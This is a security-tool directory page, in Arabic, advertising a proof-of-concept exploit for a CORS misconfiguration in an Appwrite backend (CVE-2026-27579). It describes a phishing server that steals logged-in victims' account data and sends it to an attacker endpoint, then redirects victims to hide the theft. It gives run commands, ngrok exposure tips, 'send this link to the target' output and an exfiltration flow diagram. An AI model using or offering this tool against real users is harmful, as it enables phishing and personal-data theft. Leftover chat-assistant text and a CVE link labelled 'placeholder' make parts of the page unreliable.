Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/mbanyamer/cve-2026-27579-collabplatform-appwrite-cors-misconfiguration
أدوات التصيدتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويبالفريق الأحمر
GitHubmbanyamer/cve-2026-27579-collabplatform-appwrite-cors-misconfiguration

CVE-2026-27579-CollabPlatform-Appwrite-CORS-Misconfiguration

استغلال PoC لثغرة CVE-2026-27579، وهي سوء تكوين CORS في الواجهة الخلفية لـ Appwrite، تُظهر سرقة بيانات الحساب المعتمدة عبر صفحة تصيّد خبيثة.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
منذ 6 أشهرلم تتم المراجعة بعد

استغلال سوء تكوين CORS في Appwrite - إثبات المفهوم

CVE-2026-27579 – تسريب بيانات الحساب الموثّق عبر CORS متساهل

Author Role Country Platform Vulnerability CVE Status License

CVE-2026-27579 (GHSA-qh5m-p8jh-hx88)
سوء تكوين خطير في CORS في الواجهة الخلفية لـ Appwrite المستخدمة في منصة التعاون في الوقت الفعلي يسمح لأصل يتحكم فيه المهاجم بقراءة بيانات المستخدم الحساسة الموثّقة (البريد الإلكتروني، معرف المستخدم، حالة MFA، إلخ) من الضحايا المسجّلين عبر طلبات عبر الأصول مع بيانات الاعتماد.

البرنامج المتأثر

  • المشروع: realtime-collaboration-platform (CollabPlatform)
  • الواجهة الخلفية: Appwrite Cloud مع تكوين CORS متساهل
  • المكوّن القابل للاستغلال: نقطة النهاية /v1/account مع انعكاس Access-Control-Allow-Origin + Access-Control-Allow-Credentials: true
  • التأثير: الاستيلاء على الحساب / تسريب معلومات التعريف الشخصية الحساسة عبر التصيد / زيارة صفحة خبيثة

مخطط تدفق الهجوم

root@kitploit:~
flowchart TD
    A[Victim is logged in\nCollabPlatform / Appwrite] --> B[Victim visits attacker-controlled page\nphishing link / malvertising]
    B --> C[Browser sends GET /v1/account\nwith session cookies credentials: 'include']
    C --> D[Appwrite reflects arbitrary Origin\nAccess-Control-Allow-Origin: evil.com]
    D --> E[Access-Control-Allow-Credentials: true]
    E --> F[Browser allows JavaScript to read response\nemail, $id, mfa, name, ...]
    F --> G[Data exfiltrated to attacker server\nPOST /collect]
    G --> H[Attacker receives full account details]

الميزات

  • خادم خبيث بسيط مبني على Flask
  • يولّد صفحة تصيد تسرق بيانات حساب Appwrite الموثّقة
  • يسرّب البيانات إلى نقطة نهاية المهاجم (يطبعها ويحفظها في ملف)
  • يدعم --lhost و --lport مخصصين
  • يعيد توجيه الضحية إلى Google بعد السرقة (لإخفاء النية)

المتطلبات

root@kitploit:~
pip install flask

الاستخدام

root@kitploit:~
# الاستخدام الأساسي
python3 exploit.py --lhost 192.168.1.100 --lport 8000

# باستخدام نطاق / عنوان IP عام
python3 exploit.py --lhost attacker.yourdomain.com --lport 8080

# للتعرض العام (موصى به)
# 1. شغّل السكربت
# 2. استخدم ngrok: ngrok http 8000
# 3. استبدل http://<lhost>:<lport> في الكود برابط ngrok الخاص بك
#    (أو أعد التشغيل مع --lhost = your-ngrok-url.ngrok-free.app)

مثال على المخرجات عند التشغيل:

root@kitploit:~
[*] Starting malicious server → http://192.168.1.100:8000
[*] Send this link to the target:
    http://192.168.1.100:8000/

عندما يزور الضحية الرابط وهو مسجّل الدخول → تظهر البيانات في الطرفية + تُحفظ في stolen_accounts.txt

تحذير قانوني وأخلاقي

هذا الكود مقدم لأغراض تعليمية، واختبارات الأمان المصرّح بها، وتمارين الفريق الأحمر، وأبحاث الثغرات فقط.

الاستخدام غير المصرّح ضد أي نظام أو فرد دون إذن كتابي صريح غير قانوني في معظم الدول (قوانين الاحتيال الحاسوبي، الوصول غير المصرّح به، سرقة البيانات، التصيد، إلخ).

استخدم فقط في البيئات التي تملكها أو لديك إذن رسمي لاختبارها.

المراجع

  • CVE: https://nvd.nist.gov/vuln/detail/CVE-2026-27579 (placeholder – actual CVE may differ)
  • GitHub Advisory: https://github.com/karnop/realtime-collaboration-platform/security/advisories/GHSA-qh5m-p8jh-hx88
  • CWE-346: Origin Validation Error
  • CWE-942: Permissive Cross-domain Policy with Untrusted Domains

المؤلف

محمد إدريس بني عامر
باحث أمني
الأردن
Instagram: @banyamer_security

لا تتردد في نسخ ولصق هذا مباشرة في ملف README.md الخاص بك.

إذا كنت تريد إضافة لقطات شاشة، أو تغيير ألوان الشارات، أو إضافة أقسام إضافية (عرض توضيحي، تخفيف، إلخ)، أو تضمين شارة الترخيص / عدّادات النجوم / الشوكات — أخبرني ويمكنني توسيعه.

تنزيل الأداة